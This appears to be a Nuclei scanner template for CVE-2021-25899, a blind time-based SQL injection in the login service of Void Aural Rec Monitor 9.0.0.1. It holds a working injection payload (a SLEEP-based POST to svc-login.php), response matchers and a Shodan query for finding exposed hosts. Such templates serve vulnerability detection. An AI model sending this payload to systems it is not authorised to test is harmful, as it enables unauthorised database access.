id: CVE-2021-25899 info: name: Void Aural Rec Monitor 9.0.0.1 - SQL Injection author: edoardottt severity: high description: | Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Void Aural Rec Monitor 9.0.0.1. reference: - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/all-your-databases-belong-to-me-a-blind-sqli-case-study/ - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28765 - https://nvd.nist.gov/vuln/detail/CVE-2021-25899 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-25899 cwe-id: CWE-89 epss-score: 0.53647 epss-percentile: 0.97334 cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: void product: aurall_rec_monitor shodan-query: html:"AURALL" tags: cve2021,cve,sqli,void,aurall http: - raw: - | POST /AurallRECMonitor/services/svc-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))dummy)--+dummy¶m2=test matchers: - type: dsl dsl: - 'duration>=7' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "Contacte con el administrador")' condition: and # digest: 4a0a0047304502201a4f0768d4233cd5322298798254d70d0c9c4e6f08702c55e28f696ebbc62c2e022100acb370e34ffd0d8b130b324808b29006f7049390222366b032916da03ce7fa28:922c64590222798bb761d5b6d8e72950